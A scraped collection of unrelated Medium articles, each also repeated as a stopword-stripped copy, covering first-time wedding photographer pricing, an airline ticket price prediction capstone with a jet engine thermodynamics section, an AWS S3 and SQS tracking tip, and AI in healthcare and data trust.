to help our clients get on the same page as us for the flow of their day. Little things like these go a long way to creating organization pro-actively. 3). They won’t have the best gear to back them up. The honest truth is, budget photographers will be photographing on budget gear. We mentioned in this post that we shot our first weddings on a Canon Rebel camera — a good beginner camera, but not really one that is up to the task of making professional images in any consistent fashion. The (obvious) reason for this is because professional camera gear costs money. If a wedding photographer isn’t being paid enough to afford this type of equipment, how can they take really great photos? Because the actual costs can often feel intangible, we can tell you we’ve spent over $30,000 on camera gear to help us support the creation of high quality and beautiful images in any environment. Budget gear can work when conditions are right, but once you enter a low light or imperfect lighting environment, it becomes harder and harder to get good images. If anything is true about wedding photography, it’s that consistency should be one of the goals. If you’re an aspiring wedding photographer and need help getting the right camera, lenses, etc. — check out our Recommended Gear pages right now! 
Your Thoughts? So — what do you think? Is the price range of $0 — $1,000 reasonable in your mind for a first time wedding photographer? Why or why not? We’d like to hear your thoughts and let this run into a good discussion on the topic. We know that many people have opinions including established photographers, prospective clients trying to figure out what is a normal rate to be paying, and the first time photographers themselves! Let us know which camp you fall into, too!
https://medium.com/swlh/how-much-should-a-first-time-wedding-photographer-cost-7f9ecb67706d
['Chris Romans']
2019-08-09 22:41:18.156000+00:00
['Freelancing', 'Business', 'Photography', 'Startup', 'Entrepreneurship']
Title Much First Time Wedding Photographer CostContent Last Updated August 9th 2019 average price range would expect first time wedding photographer charge service 0 — 1000 photographer looking absolute first wedding experience may willing shoot free exchange “exposure” ability build wedding photography portfolio hand photographer deem time worth something monetary still want offer highly discounted service competitive established photographer marketplace hard fast rule opinion based personal experience pricing wedding photography service seeing starting rate charged photographer around web circle friend you’re hard number already want detail feel first time wedding photographer fall 0 — 1000 price range — we’re going cover detail Photography Intern v Photography Professional matter job person choosing work level learning curve best wedding photographer normally opportunity assist shadow second shoot already established wedding photographer get taste work without fully invest responsibility job often think starting photographer “interns” wedding industry much way person would intern teacher counselor etc idea “unpaid intern” seems getting le common least United States still remains one potential route idea intern receiving compensation form experience — may sufficient compensation simple fact — many photographer frankly — creatives working virtually industry object idea “working exposure” least understand logic behind working “exposure” actually result Okay — make sense working exposure don’t really agree principal especially true field wedding photography — high pressure high stress time outsider looking may seem easy enough — person taking picture people getting married practice though there’s lot need communication designing effective logistics wedding day thing outside “photography” earliest shoot free exposure incentive growing portfolio beneficial exposure never really translated anything tangible rarely would receive referral new business shoot benefited hand experience maybe enough extent benefit Every wedding photographer new experienced make decision time worth starting working free get little bit experience may okay that’s fine decision go route u — time valuable free never option anymore save maybe shooting photo charity like Lay Sleep wedding photographers’ job 8 hour single wedding day practice every booking result least 40–80 hour work — engagement shoot wedding day shooting photo editing email communication person meeting assembling timeline etc Whether photographer trying figure pricing prospective client looking figure much expecting pay — challenge keep mind wedding photographer looking maybe comparing way people probably put ton job realize paid accordingly — get dictate value value free first client — fine let it’s 500 — rad let decide take giant leap maybe already lot photography experience niche mean jump higher price point make mistake exposure doesn’t compensation Rarely promise exposure pay Money Real Compensation defining feature professional wedding photographer charge money amount service started charge shoot wedding session began approach thing business instead someone dabbling virtually new hobby money made invested new camera gear professional service make workflow better give client better experience time — allow u thing money personal level like travel think it’s entirely reasonable person starting industry get foot wet little financial incentive sustainable way living effort value — even ultimately artistic pursuit you’re newbie wedding photographer 
consider charging even 50 first wedding don’t photography portfolio established least make people value time effort you’re potential client looking wedding photographer cheap willing spend least little bit money someone present documenting one important day life photographer charging considering dropping tip end night way saying thanks time 3 Benefits Hiring First Time Wedding Photographer 1 Lower cost client budget people looking hire wedding photographer without lot extra spending money photographer starting going good match won’t level experience portfolio support still great work capture day got married back 2016 tight budget wedding wedding photography important u — time affording 5000 photographer wasn’t card struggled even keep rented house heated — even love respect work people saw ended finding great photographer starting rocking time love photo still stay connected we’ve opportunity see grow wedding photo business Related 2 Creating opportunity photographer photography industry filled lot people available take work Often hardest part getting first gig two client giving someone chance make dream come true huge deal Obviously want sure click person seem like come within reason wanting — great side effect 3 bring unrestricted point view wedding It’s easy wedding photographer done dozen hundred wedding get simple mindset thing Don’t get u wrong — definitely value sort approach situation easy turn cynicism bad case “honing in” get shot done Beginner photographer often lot unhinged They’re excited take great photo really great time since won’t feel like work yet Photographing one wedding lot different photographing 60th — tell 3 Downsides Hiring First Time Wedding Photographer 1 lack experience wedding day it’s really easy tell good wedding photographer bad one we’ve pointed beginner photographer bad — say lack experience sometimes necessary navigate wedding day successfully might thinking — wedding aren’t hard Sure — others throw curveballs schedule thrown family friend BG stirring drama photographer lot wedding experience able better adapt get shot needed — able predict type thing well 2 lack organization look back earliest wedding realize — “wow pretty disorganized” struggled figuring flow day communicating effectively client even finding way around wedding venue Since approach become much refined well professional start get organized many client even book u get info need upfront send wedding questionnaire month advance put together timeline help client get page u flow day Little thing like go long way creating organization proactively 3 won’t best gear back honest truth budget photographer photographing budget gear mentioned post shot first wedding Canon Rebel camera — good beginner camera really one task making professional image consistent fashion obvious reason professional camera gear cost money wedding photographer isn’t paid enough afford type equipment take really great photo actual cost often feel intangible tell we’ve spent 30000 camera gear help u support creation high quality beautiful image environment Budget gear work condition right enter low light imperfect lighting environment becomes harder harder get good image anything true wedding photography it’s consistency one goal you’re aspiring wedding photographer need help getting right camera lens etc — check Recommended Gear page right Thoughts — think price range 0 — 1000 reasonable mind first time wedding photographer We’d like hear thought let run good discussion topic know many people opinion including established 
photographer prospective client trying figure normal rate paying first time photographer Let u know camp fall tooTags Freelancing Business Photography Startup Entrepreneurship
3,836
Combining Data Science and Machine Learning with the Aviation Industry: A Personal Journey through a Capstone Project (Part II)
As a result of these initial scores, Figure 7 and Figure 8 above were created to analyze the residuals of our model on the training and testing sets. Each figure tells us that our model was appropriately chosen, as the residuals do not show any clear patterns and reveal a reasonably even spread of points above and below the horizontal red line. The horizontal red line marks zero residual, the idealized case in which our model's predictions match the labels, while the scattered points represent the difference in value between each prediction and its label. Discovering a pattern in the residuals with our own eyes would indicate that we could use a better model to describe the system — logically, if you recognize a pattern in your errors, then you should recognize that there is a way to reduce that error by incorporating the pattern into your model. If the residuals in both graphs showed an uneven spread — where significantly more points sit on one side of the horizontal line than the other, or where the residuals slowly spread out further and further from the horizontal line — it would mean the model could still be tweaked to even out the residuals. Conclusions, Study Summary, and Thanks… It's safe to start by stating that the study showed signs of moderate success. Despite a variety of constraints — such as limited air travel under the new regime, problems integrating API data together, unbalanced data, time constraints, data access restrictions, and more — we were able to come out with a "proof-of-concept" study to show how a machine learning model can be used to predict the minimum cost threshold of airline tickets in this new regime. On the other hand, it is still appropriate to mention that the limitations of our model could make this attempt impractical from a business perspective, given how niche the study had become, the corners that had to be cut, and questions about how practical and reliable the models will be. However, almost all models face general limitations due to niche barriers, which leaves us hopeful that our model is just like any other model used to predict the same label (it can only get better). Through this study, a lot was covered, and it may be difficult now to fully gather together what was taken from both of the articles written here. To summarize, we as data scientists were approached by a business to answer the question, "What is the minimum cost threshold an airliner can charge their passengers per flight and how can we make a model that discovers this?" We were given a month's time to have a working proof of concept. We achieved these goals, to some degree. Through the process, we learned about regime change and how the Covid-19 pandemic played an instrumental role in our data collection phase. We learned about the limitations of using different APIs and what sort of cleaning must be done on the data. We discussed how we can overcome data domain issues and create data out of our collection methods by using unique ways to increase data and add diversity to it. We learned about bootstrapping to expand our data and about machine learning methods such as linear regression, cross-validation, KNN regression, and Decision Tree regression. We learned about ensemble machine learning methods such as Bagging regression and Random Forest, and simultaneously discussed the data imbalance arising from the trends we uncovered. We ultimately created a model with a cross-validated mean absolute error of $173 — all done without heavy hyperparameter tuning.
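As a rough illustration of the kind of residual check and cross-validated scoring described above, the sketch below uses scikit-learn on a synthetic stand-in dataset; the feature matrix X and price labels y are placeholders, not the actual flight data from the study.

```python
# Minimal sketch of a residual plot and cross-validated MAE check.
# X and y are synthetic placeholders for the engineered flight features
# and ticket-price labels used in the capstone (not reproduced here).
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.ensemble import RandomForestRegressor

rng = np.random.default_rng(42)
X = rng.normal(size=(500, 6))                      # stand-in feature matrix
coef = rng.normal(size=6) * 40
y = 300 + X @ coef + rng.normal(scale=30, size=500)  # stand-in ticket prices

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

model = RandomForestRegressor(n_estimators=200, random_state=42)
model.fit(X_train, y_train)

# Cross-validated mean absolute error, analogous to the figure reported above
mae = -cross_val_score(model, X_train, y_train,
                       scoring="neg_mean_absolute_error", cv=5).mean()
print(f"Cross-validated MAE: ${mae:.0f}")

# Residuals vs. predictions: an even, patternless spread around the zero line
# is what a residual check like Figures 7 and 8 is looking for.
for name, (features, labels) in {"train": (X_train, y_train),
                                 "test": (X_test, y_test)}.items():
    preds = model.predict(features)
    plt.scatter(preds, labels - preds, s=8, alpha=0.5, label=name)
plt.axhline(0, color="red")        # horizontal reference line (zero residual)
plt.xlabel("Predicted price")
plt.ylabel("Residual")
plt.legend()
plt.show()
```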
To me, this capstone project served as a very personal journey to prove myself in the world of data. I wanted to use what I knew about the aerospace industry and combine it with data analytics to ultimately showcase a project worth investing more time and resources into. With a more stable regime, more access to data, and more time, this project has the capability to scale to help a real-world business. Writing this series has been a joy as I wanted to really express what I know to the world and also help someone learn from the study. Machine learning is a popular field to talk about, but it is often hard to find real-world practical implementations models. Many times, machine learning is left back with research as its uses for studies become too personalized around a specific problem. Ultimately I want the people, who took their precious time from their day to read this article, to come out of this series learning something new and thinking on ways to better analyze data and to apply machine learning to societal problems. I greatly appreciate your time and give my sincerest thanks. Do not stop teaching yourself and do push on to bigger and better things while you still can in this world; cherish what you learn as you go on. Cheers! BONUS: Learning How Thermodynamics can be Used to Predict Pricing My background is in engineering and I did as best as I could to reflect that here, but I know there is more which could have been done to better integrate engineering concepts into the study. In truth, this capstone project was initially inspired by a project I had done in my undergraduate studies with Hofstra University. One of my final design projects was meant for my Thermal Engineering course, which is the field that studies thermodynamic principles on machines. In this senior design project, I analyzed a trans-Atlantic flight I flew on earlier that year and collected data regarding that flight’s speed and altitude from FlightAware.com. At the time, it was much easier to get this data ported into an Excel spreadsheet, without the need for scraping — and this was before I knew how to use Python, how to web scrape, or how to play with APIs. From this data alone, along with some idealized assumptions, I was able to successfully perform a comprehensive idealized jet propulsion engine analysis on the plane’s engines and determine many important properties of the air traveling through the turbofans. I wanted to include this section as a bonus for one to ponder on when thinking about this study, as it is the “lost link” still wished to be integrated into the project, but could not have been implemented due to the FlightXML API constraints in the study and the lack of flight data due to Covid-19. Instead, I will give a walkthrough description of the project performed back in my undergraduate course in 2018, as an example to show what extra data could have been generated to potentially help better our model. On October 17th, 2018 I flew on flight BA115 (British Airways flight 115) to travel from London Heathrow Airport to JFK International Airport. The goal of such previous project was to perform and analysis on the thermodynamic cycle states of the engines. FlightAware.com was used primarily to access accurate speed and altitude measurements of the individual flight, as the plane logged such information over time to nearby radio checkpoints along the route. 
From FlightAware.com, it was also discovered that the plane flown was a B747–400, which is a quad-jet aircraft and is a variant of the B747 series — notoriously considered the most notable aircraft design in all of history of human flight. Above are two images of the October 17th flight flown in 2018. Unfortunately, it is not possible to access the graphic above from FlightAware.com anymore as basic access users only have access to 3 months of data history. As a result, take the referenced source for the above graphics with appropriate consideration that it may not be reflecting the same exact path described in the study, but is similar enough for our intended purposes. From FlightAware.com, I was able to retrieve 660 data points of speed, altitude, direction, time, and more of flight BA115. From this data, it was determined that the flight time lasted eight hours and fifteen minutes (29,700 seconds equivalent) and the total distance flown was 5,922.386 kilometers. The weather of that particular day showed clear skies throughout the entirety of the flight, eliminating the need for massive environmental constraints. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) In analyzing thermodynamic machines, graphics such as the one above are used to understand the different property states occurring through the machine’s life cycle. The one above showcases the relationship between entropy and temperature within the jet engine’s idealized lifecycle. Entropy (commonly defined as the variable “S” in theoretical thermodynamics…unlike our graphic denoting a lowercase “s” for “specific entropy” on the horizontal axis) is a measure of “how much energy is not available to do work in a system”. It is often closely associated with chaos or a measure of how a system becomes more disordered over time. The units of entropy are measured in Joules/Kelvin. Engineers, must understand what entropy is, but will more often use specific entropy in their analysis where its units are measured as kiloJoules/(kilograms*Kelvin) or more easily defined as entropy per mass. Specific entropy is often used to analyze a certain form of mass existing within a system, hence the inclusion kilogram units in the denominator. Specific entropy can change dependent on different states within a system — often for water, empirical steam tables are referenced to analyze the specific entropy of water to provide a better understanding of a system. For our case, we will be analyzing air, where such tables are not readily needed. Reverting back to our diagram above, the T-s diagram (Temperature vs entropy diagram) indicates how energy of air within the plane’s engine is analyzed during its lifecycle with pressure held constant across some processes. In entropy states one through three, pressure is increased through isentropic compression. Here, air travels first from the engine’s inlet, through the diffuser and then through the compressor. In process three to four, the air then travels through a burner/combustion chamber from the compressor. The air itself is heated up at constant pressure, resulting in higher entropic value, which simultaneously increases the heat transfer per unit mass (denoted as the variable “q”). The air currently is prone to a higher energy release. 
In process four through six, the air undergoes isentropic expansion where pressure is released on the journey from the combustion chamber, through the turbine, and out the nozzle exit. This pressure release ultimately thrusts the aircraft forward with immense, constant force. Ideal Jet Propulsion Cycle referenced from (Cengal Y.A. & Boles M.A., 2002. Thermodynamics: An Engineering Approach. McGraw-Hill Companies Inc. New York, NY. 483–487) Throughout the study, several different assumptions and underlying initial conditions need to be addressed for the analysis. First, it was important to treat air as an ideal gas, meaning that air properties behave predictably at standard temperatures and pressures. From Appendix A.1 in the fourth edition of Engineering Thermodynamics by M. David Burghardt and James A. Harbach, the specific heat of air at constant pressure used in the study was 1.005 kiloJoules/(kilograms*Kelvin) and the specific heat ratio of air (k = cp/cv) used was 1.4. Both of these numbers will be important for the mathematical formulas used in learning about engine properties. Specific heat is a measure of how much energy must be added to a substance to raise its temperature. Specific heat can change depending on surrounding factors, which is why it is important to state what is held constant when relying on the ideal gas law (and why we assumed air to be ideal in our analysis). Specific heat is affected by changes in volume and pressure, which is why we only analyze it for ideal purposes by holding one of those independent variables constant. In our case, the engine's heat addition occurs at constant pressure, which is why we use the constant-pressure specific heat value for air, consistent with the deterministic nature of the study. The specific heat ratio is the ratio of the specific heat at constant pressure to the specific heat at constant volume, and it governs the isentropic relations used in the cycle analysis. The operating conditions of the engine were assumed to be steady state, which means that the system state variables remain constant over time. Self-made whiteboard image. The plane was theoretically treated as a stationary object, with the recorded speed of the aircraft taken as the air free-stream velocity (denoted "v" subscript "∞"), equal in magnitude to the velocity of the aircraft (denoted "v" subscript "aircraft"). This assumption allows us to treat the free-stream velocity as the velocity of the air entering each jet engine intake. Furthermore, changes in kinetic and potential energy in the system were taken as negligible except at the inlet and exit conditions, and the atmospheric temperature, pressure, and air density were taken as averaged values between zero and 15,000 meters of altitude. From the UK Civil Aviation Authority Engine Type Certification Data Sheet №1048, it was uncovered that four Rolls Royce RB211–524H jet engines are typically used on a B747–400. For this study, only one engine will be analyzed, and the findings from the individual engine analysis will be assumed to hold across all four jets mounted on the airplane. A uniform diameter is assumed for the jet shaft, with a length of 2.19 meters. The turbine work was assumed to be equal to the compressor work. The velocity of the air leaving the diffuser was assumed to be equal to zero meters per second. The thrust generated from bypassing air was neglected. The combustion chamber temperature was assumed to be 2,273 degrees Kelvin. The compression ratio, which for a jet engine is the overall pressure ratio across the compressor, was found to be 32.9:1.
Generalized Analysis: Where Thermodynamics could have Merged with Machine Learning With all such assumptions and initial conditions factored in, what follows is the mathematical analysis performed on the ideal jet propulsion cycle. All of this analysis stems from the concepts learned in my undergraduate studies and follows the teachings of Dr. Burghardt himself, who wrote the heavily used textbook mentioned earlier, Engineering Thermodynamics. Through this analysis, we will primarily characterize the engine states through a measure known as enthalpy, or enthalpy per unit mass for our system. Enthalpy captures the energy content of the flowing air, and its changes measure the energy transferred between a system and its surroundings. Throughout our analysis, understanding this enthalpy will help us uncover all of the property states needed to tell us more about what is going on with our engine. This is where the magic occurs, in my opinion. In a rather elegant way, we scientists have the ability to know what is going on at every stage of the engine simply by tracking how much energy is moving within it — and we don't even have to physically be on the airplane to do this. It was my intention to use this analysis to perform very comprehensive EDA for our initial machine learning study and to include an analysis of the different engines present on the different planes found in our study — ultimately building a highly accurate tool able to give a better cost estimate of the journey analyzed. From such data, we could find a way to factor in important features such as measured average air temperature/pressure states, measured engine efficiency, measured thrust output, and measured propulsive thrust power. Expanding further on this could allow us to analyze air-fuel ratios and changing fuel mass over time on a flight, and maybe help us understand how passenger payload can play a role in savings. Before observing some MATLAB-generated plots of these dependent variables, we will first go over the generalized analysis. Self-created LaTeX.
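To make that generalized analysis concrete, here is a minimal numerical sketch of the ideal jet propulsion cycle bookkeeping described above, written in Python rather than MATLAB. It uses the stated assumptions (cp = 1.005 kJ/kg·K, k = 1.4, a 2,273 K combustion chamber temperature, a 32.9:1 pressure ratio, and turbine work equal to compressor work); the ambient temperature, pressure, and cruise speed below are illustrative placeholders, not the averaged FlightAware values from the original study.

```python
# Sketch of the ideal jet propulsion cycle, state numbering per the T-s diagram:
# 1 inlet, 2 diffuser exit, 3 compressor exit, 4 combustor exit, 5 turbine exit, 6 nozzle exit.
# Ambient state and cruise speed are placeholders, not the study's averaged values.
cp = 1005.0            # J/(kg*K), specific heat of air at constant pressure
k = 1.4                # specific heat ratio of air (cp/cv)
rp = 32.9              # compressor pressure ratio
T1, P1 = 220.0, 30e3   # K, Pa   (placeholder cruise-altitude ambient state)
V1 = 250.0             # m/s     (placeholder free-stream / aircraft speed)
T4 = 2273.0            # K       (assumed combustion chamber temperature)

# 1 -> 2: diffuser ideally brings the air to rest, isentropically
T2 = T1 + V1**2 / (2 * cp)
P2 = P1 * (T2 / T1) ** (k / (k - 1))

# 2 -> 3: isentropic compression through the pressure ratio
P3 = rp * P2
T3 = T2 * rp ** ((k - 1) / k)

# 3 -> 4: constant-pressure heat addition in the combustion chamber
P4 = P3
q_in = cp * (T4 - T3)              # heat added per unit mass of air, J/kg

# 4 -> 5: turbine work exactly balances compressor work (stated assumption)
T5 = T4 - (T3 - T2)
P5 = P4 * (T5 / T4) ** (k / (k - 1))

# 5 -> 6: isentropic expansion through the nozzle back to ambient pressure
T6 = T5 * (P1 / P5) ** ((k - 1) / k)
V6 = (2 * cp * (T5 - T6)) ** 0.5   # nozzle exit velocity, m/s

specific_thrust = V6 - V1                 # thrust per unit mass flow, one engine, N/(kg/s)
propulsive_power = specific_thrust * V1   # propulsive power per unit mass flow, W/(kg/s)

for label, value, unit in [("Diffuser exit T2", T2, "K"),
                           ("Compressor exit T3", T3, "K"),
                           ("Turbine exit T5", T5, "K"),
                           ("Nozzle exit velocity", V6, "m/s"),
                           ("Specific thrust", specific_thrust, "N/(kg/s)")]:
    print(f"{label}: {value:8.1f} {unit}")
```

Feeding state temperatures, pressures, and specific thrust like these back into the feature set is the kind of engineering-driven EDA the paragraph above has in mind.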
https://medium.com/analytics-vidhya/combining-data-science-and-machine-learning-with-the-aviation-industry-a-personal-journey-through-f063895fbd47
['Christopher Kuzemka']
2020-11-05 17:53:54.124000+00:00
['Data', 'Machine Learning', 'Aviation', 'Engineering', 'Python']
Title Combining Data Science Machine Learning Aviation Industry Personal Journey Capstone Project Part IIContent result initial score Figure 7 Figure 8 created analyze residual within model training testing figure tell u model appropriately chosen residual show clear pattern also decently reveal even spread point horizontal red line horizontal red line represents idealized regression model scattered point represent difference value consecutive prediction label Discovering pattern residual eye would indicate use better model describe system — logically recognize pattern error mean recognize way reduce error incorporating pattern model residual graph showed uneven spread — significant amount point exist one threshold separated horizontal line residual show pattern slowly spreading horizontal line — mean model could still tweaked account evening residual Conclusions Study Summary Thanks… It’s safe start stating study showed sign moderate success variety constraint — limited air travel new regime change problem integrating API data together unbalanced data time constraint data access restraint — able come “proofofconcept” study show machine learning model used predict minimum cost threshold airline ticket new regime contrary still appropriate mention limitation model make attempt pointless business perspective due niche study become corner cut practicalreliable model However almost model face general limitation due niche barrier leaf u hopeful say model like model used predict label get better study lot covered may difficult fully gather together taken article written summarize data scientist approached business answer question “What minimum cost threshold airliner charge passenger per flight make model discovers this” given month time working proof concept achieved goal degree process learned regime change Covid19 pandemic played instrumental role data collection phase learned limitation using different APIs sort cleaning must done data discussed overcome data domain issue create data collection method using unique way increase data add diversity learned bootstrapping expand data machine learning method Linear regression cross validation KNN regression Decision Tree regression learned ensemble machine learning Bagging regression Random Forest simultaneously discussed data imbalance occurring trend uncovered ultimately created model cross validated mean absolute error 173 — done without heavy hyperparameter tuning capstone project served personal journey prove world data wanted use knew aerospace industry combine data analytics ultimately showcase project worth investing time resource stable regime access data time project capability scale help realworld business Writing series joy wanted really express know world also help someone learn study Machine learning popular field talk often hard find realworld practical implementation model Many time machine learning left back research us study become personalized around specific problem Ultimately want people took precious time day read article come series learning something new thinking way better analyze data apply machine learning societal problem greatly appreciate time give sincerest thanks stop teaching push bigger better thing still world cherish learn go Cheers BONUS Learning Thermodynamics Used Predict Pricing background engineering best could reflect know could done better integrate engineering concept study truth capstone project initially inspired project done undergraduate study Hofstra University One final design project meant Thermal 
Engineering course field study thermodynamic principle machine senior design project analyzed transAtlantic flight flew earlier year collected data regarding flight’s speed altitude FlightAwarecom time much easier get data ported Excel spreadsheet without need scraping — knew use Python web scrape play APIs data alone along idealized assumption able successfully perform comprehensive idealized jet propulsion engine analysis plane’s engine determine many important property air traveling turbofan wanted include section bonus one ponder thinking study “lost link” still wished integrated project could implemented due FlightXML API constraint study lack flight data due Covid19 Instead give walkthrough description project performed back undergraduate course 2018 example show extra data could generated potentially help better model October 17th 2018 flew flight BA115 British Airways flight 115 travel London Heathrow Airport JFK International Airport goal previous project perform analysis thermodynamic cycle state engine FlightAwarecom used primarily access accurate speed altitude measurement individual flight plane logged information time nearby radio checkpoint along route FlightAwarecom also discovered plane flown B747–400 quadjet aircraft variant B747 series — notoriously considered notable aircraft design history human flight two image October 17th flight flown 2018 Unfortunately possible access graphic FlightAwarecom anymore basic access user access 3 month data history result take referenced source graphic appropriate consideration may reflecting exact path described study similar enough intended purpose FlightAwarecom able retrieve 660 data point speed altitude direction time flight BA115 data determined flight time lasted eight hour fifteen minute 29700 second equivalent total distance flown 5922386 kilometer weather particular day showed clear sky throughout entirety flight eliminating need massive environmental constraint Ideal Jet Propulsion Cycle referenced Cengal YA Boles 2002 Thermodynamics Engineering Approach McGrawHill Companies Inc New York NY 483–487 analyzing thermodynamic machine graphic one used understand different property state occurring machine’s life cycle one showcase relationship entropy temperature within jet engine’s idealized lifecycle Entropy commonly defined variable “S” theoretical thermodynamics…unlike graphic denoting lowercase “s” “specific entropy” horizontal axis measure “how much energy available work system” often closely associated chaos measure system becomes disordered time unit entropy measured JoulesKelvin Engineers must understand entropy often use specific entropy analysis unit measured kiloJouleskilogramsKelvin easily defined entropy per mass Specific entropy often used analyze certain form mass existing within system hence inclusion kilogram unit denominator Specific entropy change dependent different state within system — often water empirical steam table referenced analyze specific entropy water provide better understanding system case analyzing air table readily needed Reverting back diagram Ts diagram Temperature v entropy diagram indicates energy air within plane’s engine analyzed lifecycle pressure held constant across process entropy state one three pressure increased isentropic compression air travel first engine’s inlet diffuser compressor process three four air travel burnercombustion chamber compressor air heated constant pressure resulting higher entropic value simultaneously increase heat transfer per unit mass denoted variable “q” 
air currently prone higher energy release process four six air undergoes isentropic expansion pressure released journey combustion chamber turbine nozzle exit pressure release ultimately thrust aircraft forward immense force constantly Ideal Jet Propulsion Cycle referenced Cengal YA Boles 2002 Thermodynamics Engineering Approach McGrawHill Companies Inc New York NY 483–487 Throughout study several different assumption underlying initial condition need addressed analysis First important treat air ideal gas meaning air property behave normal standard temperature pressure Appendix A1 fourth edition Engineering Thermodynamics David Burghardt James Harbach specific heat air constant pressure used study 1005 kiloJouleskilogramsKelvin Boltzmann constant used 14 number important mathematical formula used learning engine property Specific heat measure much energy must added property raise temperature Specific heat change depending surrounding factor important denote held constant factor relying ideal gas law assumed air idealistic analysis Specific heat affected changing volumetric pressure value analyze measure ideal purpose holding one independent variable constant case engine undergo constant pressure process use specific heat number constant pressure air deterministic nature study Boltzmann constant number measuring proportion property’s energy thermodynamic temperature operating condition engine assumed steady state mean system state variable remain constant Selfmade whiteboard image plane theoretically assumed stationary object recorded speed aircraft factored air freestream velocity denoted “v­­” subscript “∞” equalrepresent velocity aircraft denoted “v” subscript “aircraft” assumption allows u state freestream velocity act jet engine intake Furthermore kinetic potential energy system negligible except inlet exit condition plus atmospheric temperature pressure air density averaged value zero 15000 meter altitude UK Civil Aviation Authority Engine Type Certification Data Sheet №1048 uncovered four Rolls Royce RB211–524H jet engine typically used B747–400 study one engine analyzed finding individual engine analysis assumed across four jet mounted airplane uniform diameter assumed jet shaft length 219 meter turbine work assumed equal compressor work velocity air leaving diffuser assumed equal zero meter per second thrust generated bypassing air neglected combustion chamber temperature assumed 2273 degree Kelvin compression ratio ratio total volume clearance volume piston found 3291 Generalized Analysis Thermodynamics could Merged Machine Learning assumption initial condition factored follows mathematical analysis performed analyze ideal jet propulsion cycle analysis stemming concept learned undergraduate study following teaching Dr Burghardt wrote heavily used textbook mentioned earlier Engineering Thermodynamics analysis primarily observe engine state remarking measure known enthalpy enthalpy per unit mass system Enthalpy measure energy transfer system surroundings Throughout analysis understanding enthalpy help u uncover property state needed tell u going engine magic occurs opinion rather elegant way scientist ability know going every stage engine simply measuring much energy moving within engine — don’t even physically airplane intention use analysis perform comprehensive EDA initial machine learning study include analysis different engine present different plane found study — ultimately building highly accurate tool able give better cost estimate journey analyzed known data could find way 
factor important feature measured average air temperaturepressure state measured engine efficiency measured thrust output measured propulsive thrust power Expanding could allow u analyze airfuel ratio changing fuel mass time flight maybe help u know passenger payload play role saving start observing MATLAB generated plot dependent variable first go generalized analysis taken Selfcreated LaTeXTags Data Machine Learning Aviation Engineering Python
3,837
How to Track Unprocessed Objects in S3
Solution with SQS Introduce an SQS queue to the setup. I’ll call this queue raw-data-object-creation-event-queue. A message event will be sent to this queue whenever a new object is created in the raw-data bucket. To accomplish this, set up an event notification on the raw-data bucket that listens for all object-create events. Whenever an object is created (i.e. uploaded to this bucket), a notification event is sent to the SQS queue we created, as sketched in the example below.
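For illustration only, here is a minimal boto3 sketch of that wiring; it is an assumption about how the setup could look rather than the article's actual code, and the region, account ID and queue ARN are placeholders.

```python
import boto3

# Hedged sketch: subscribe the SQS queue to object-create events on the
# raw-data bucket. The region and account ID in the ARN are placeholders.
s3 = boto3.client("s3")

s3.put_bucket_notification_configuration(
    Bucket="raw-data",
    NotificationConfiguration={
        "QueueConfigurations": [
            {
                "QueueArn": "arn:aws:sqs:us-east-1:123456789012:raw-data-object-creation-event-queue",
                "Events": ["s3:ObjectCreated:*"],  # "All object create events"
            }
        ]
    },
)
```

The queue's access policy must also allow the S3 service principal to send messages to it; that part is omitted from the sketch.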
https://towardsdatascience.com/how-to-track-unprocessed-objects-in-s3-5a7d3b32352d
['Dardan Xhymshiti']
2020-07-07 23:43:33.532000+00:00
['AWS', 'Programming', 'Data Sceince', 'Data Engineering']
Title Track Unprocessed Objects S3Content Solution SQS Introduce SQS queue setup I’ll call queue rawdataobjectcreationeventqueue message event sent queue whenever new object created rawdata bucket accomplish set event listener rawdata bucket listen object create event happening case object created ie uploaded bucket send notification event SQS queue createdTags AWS Programming Data Sceince Data Engineering
3,838
AI in healthcare: keeping data safe and building trust
Our approach to healthcare is changing rapidly, thanks to the Internet of Things (IoT), which continues to drive the demand for services offering more intelligent analytics. As machine learning advances, there is also a broadening applicability of AI. In an increasingly digitized world of connected devices and intelligent systems, international standards play a key role in addressing the ethical, technical, safety and security aspects of the technologies we encounter in daily life. Work is already underway in a joint committee for AI established by IEC and ISO. This is the first of its kind to consider the entire AI ecosystem rather than focusing on individual technical aspects. Headed by Wael Diab, a senior director at Huawei, it draws on the breadth of application areas covered in IEC and ISO, with IT and domain experts coming from different sectors. “Connected products and services such as medical devices and automated healthcare systems must be safe and secure or no one will want to use them. Trustworthiness and related areas such as resiliency, reliability, accuracy, explainability, safety, security and privacy must be considered from a systems perspective from the get-go. Standardization will need to adopt a broad approach to cover the AI technologies and consider synergies with analytics, big data, IoT and more”, says Diab. An apple a day keeps the algorithm away From robotically-assisted surgery, virtual nursing assistants, dosage error reduction and connected devices to image analysis and clinical trials, AI technologies already play many different roles in the delivery of healthcare treatments, surgeries and services. They include improving diagnostics and helping doctors make better decisions for patients. Health insurance is a critical part of the industry and is also making use of AI. For example, some software platforms use machine learning to identify and reduce inefficiencies in the claims management process such as fraudulent inaccurate billing or waste through under-utilization of services. Others help patients choose tailored insurance coverage to reduce healthcare costs and assist employers looking for group coverage options. Digitizing healthcare The personal data of millions of patients worldwide is being gathered, stored and shared electronically in healthcare management delivery systems, clinical research and medical consultations. Doctors and researchers alone can’t leverage all this information to enhance patient care, but in a growing number of trials, algorithms have successfully mined huge numbers of patient files and medical images in a timely manner, with the result that diverse conditions are detected and diagnosed. Examples include certain cancers, the risk of heart disease and eye-related conditions. AI-powered imaging technology has learned to read thousands of anonymized complex eye scans and detected more than 50 eye conditions successfully. With an accuracy level of 94%, the algorithms matched or beat the performance of world-leading eye specialists. The argument is that this technique of sifting through big data rapidly could help reduce the time taken for patients to be seen by a consultant, and possibly save a person’s sight, but there are many hurdles to overcome before trials are fully approved. How safe is AI in the medical context? What happens if we are not in the 94% accuracy group? What if the algorithm developers get it wrong and create biases which impact patients negatively? 
